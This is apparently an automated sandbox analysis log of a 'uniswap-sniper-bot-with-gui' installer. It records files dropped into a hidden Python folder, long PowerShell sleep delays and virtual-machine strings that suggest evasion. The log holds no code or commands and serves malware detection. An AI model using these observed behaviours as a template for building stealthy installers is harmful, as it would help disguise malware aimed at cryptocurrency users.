Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\.pyp\python.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 842
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2047
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1568

Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\vk_swiftshader.dll	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\libGLESv2.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\pyexpat.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\resources\app.asar.unpacked\node_modules\utf-8-validate\prebuilds\win32-ia32\node.napi.node	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss40D.tmp\nsExec.dll	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\resources\elevate.exe	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\_socket.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\resources\app.asar.unpacked\node_modules\secp256k1\prebuilds\win32-x64\secp256k1.node	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\_overlapped.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\Lib\site-packages\charset_normalizer\md.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\_decimal.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\_queue.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\_lzma.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\_asyncio.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\Lib\site-packages\charset_normalizer\md__mypyc.cp311-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss40D.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\vulkan-1.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\_msi.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss40D.tmp\StdUtils.dll	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\vk_swiftshader.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\_ssl.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\resources\app.asar.unpacked\node_modules\bufferutil\prebuilds\win32-x64\node.napi.node	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss40D.tmp\SpiderBanner.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\winsound.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\resources\app.asar.unpacked\node_modules\keccak\prebuilds\win32-x64\node.napi.node	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\resources\app.asar.unpacked\node_modules\utf-8-validate\prebuilds\win32-x64\node.napi.node	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\_elementtree.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\vulkan-1.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\libEGL.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\_zoneinfo.pyd	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss40D.tmp\nsis7z.dll	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\libEGL.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\resources\app.asar.unpacked\node_modules\bufferutil\prebuilds\win32-ia32\node.napi.node	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\.pyp\DLLs\_uuid.pyd	Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6408	Thread sleep count: 2047 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6408	Thread sleep count: 1568 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6560	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	File Volume queried: C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui\Code Cache\js FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	File Volume queried: C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui\Code Cache\wasm FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	File Volume queried: C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui\blob_storage\21ccf41d-030a-4ff5-b142-8f901074c0a7 FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	File Volume queried: C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui\Cache\Cache_Data FullSizeInformation
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	File Volume queried: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui FullSizeInformation
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	File Volume queried: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui FullSizeInformation
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File opened: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\resources\app.asar.unpacked\node_modules\bufferutil	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File opened: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\resources\app.asar.unpacked	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File opened: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\resources\app.asar.unpacked\node_modules\bufferutil\prebuilds	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File opened: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\resources	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File opened: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\resources\app.asar.unpacked\node_modules	Jump to behavior
Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	File opened: C:\Users\user\AppData\Local\Temp\nss40D.tmp\7z-out\locales	Jump to behavior

Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Adreno (TM) 418Adreno (TM) 530Adreno (TM) 540GL_EXT_texture_lod_biasARB_draw_buffersGL_ARB_texture_swizzleGL_EXT_texture_swizzleGL_ARB_shader_bit_encodingGL_ARB_shading_language_packingGL_ARB_explicit_attrib_locationGL_ARB_explicit_uniform_locationGL_ARB_texture_gatherGL_ARB_texture_cube_map_arrayGL_ARB_pixel_buffer_objectGL_EXT_pixel_buffer_objectGL_EXT_draw_buffers2GL_ARB_fragment_shaderGL_ARB_shader_texture_lodGL_ARB_shader_viewport_layer_arrayGL_NV_viewport_array2GL_NV_texture_border_clampGL_ARB_robust_buffer_access_behaviorGL_EXT_framebuffer_sRGBGL_ARB_framebuffer_sRGBGL_ARB_gpu_shader5functions->standard == STANDARD_GL_DESKTOP && isAMDfunctions->standard == STANDARD_GL_DESKTOP && isIntelisIntel && !IsSandyBridge(device) && !IsIvyBridge(device) && !IsHaswell(device)IsApple() && isIntelisIntel && IsApple() && IsSkylake(device) && GetMacOSVersion() < OSVersion(10, 13, 2)isIntel \|\| isAMDIsLinux() && functions->standard == STANDARD_GL_DESKTOP && isAMD(IsApple() && functions->standard == STANDARD_GL_DESKTOP) \|\| (IsLinux() && isAMD)IsApple() && functions->standard == STANDARD_GL_DESKTOP && GetMacOSVersion() < OSVersion(10, 11, 0)IsApple() && isIntel && GetMacOSVersion() < OSVersion(10, 12, 0)IsApple() && isAMDIsAndroid() && isQualcommfunctions->standard == STANDARD_GL_DESKTOP && isNvidiaIsApple() \|\| isNvidiafunctions->isAtMostGL(gl::Version(4, 1)) \|\| (functions->standard == STANDARD_GL_DESKTOP && isAMD)isAMD \|\| IsAndroid()IsAndroid() \|\| isNvidia(IsAndroid() && isQualcomm) \|\| (isIntel && IsApple())isAMD \|\| isIntelIsNexus5X(vendor, device)IsAndroid() \|\| (IsWindows() && isIntel)(IsWindows() && (isIntel \|\| isAMD)) \|\| (IsLinux() && isNvidia) \|\| IsIOS() \|\| IsAndroid() \|\| IsAndroidEmulator(functions)IsAndroid() \|\| limitMaxTextureSizeIsAndroid() \|\| (IsApple() && (isIntel \|\| isAMD \|\| isNvidia))limitMaxTextureSizeIsApple()IsAndroid() \|\| isAMD \|\| !functions->hasExtension("GL_KHR_robust_buffer_access_behavior")IsApple() && isIntel && GetMacOSVersion() >= OSVersion(10, 12, 4)IsApple() && isIntel && GetMacOSVersion() < OSVersion(10, 12, 6)IsLinux() \|\| (IsAndroid() && isNvidia) \|\| (IsWindows() && isNvidia) \|\| (IsApple() && functions->standard == STANDARD_GL_ES)IsApple() \|\| (IsLinux() && isAMD)functions->standard == STANDARD_GL_DESKTOP && functions->isAtLeastGL(gl::Version(3, 1)) && !functions->isAtLeastGL(gl::Version(4, 3))features->emulatePrimitiveRestartFixedIndex.enabled && IsApple() && isIntelIsApple() \|\| IsAndroid() \|\| IsWindows()!isIntel && functions->standard == STANDARD_GL_ES && functions->isAtLeastGLES(gl::Version(3, 1)) && functions->hasGLESExtension("GL_EXT_texture_norm16")IsWindows() && isAMDIsLinux() && isAMD && isMesa && mesaVersion < (std::array<int, 3>{19, 3, 5})(IsLinux() && isVMWare) \|\| (IsAndroid() && isNvidia) \|\| (IsAndroid() && GetAndroidSdkLevel() < 27 && IsAdreno5xxOrOlder(functions)) \|\| (IsAndroid() && IsMaliT8xxOrOlder(functions)) \|\| (IsAndroid() && IsMaliG31OrOlder(functions))IsApple() && functions->standard == STANDARD_GL_ES && !(isAMD
Source: uniswap-sniper-bot-with-gui.exe, 00000008.00000000.2096036514.00007FF6D5728000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: VMware Fusion 4 has corrupt rendering with Win Vista+
Source: uniswap-sniper-bot-with-gui.exe, 00000008.00000000.2096036514.00007FF6D6009000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: VMnet
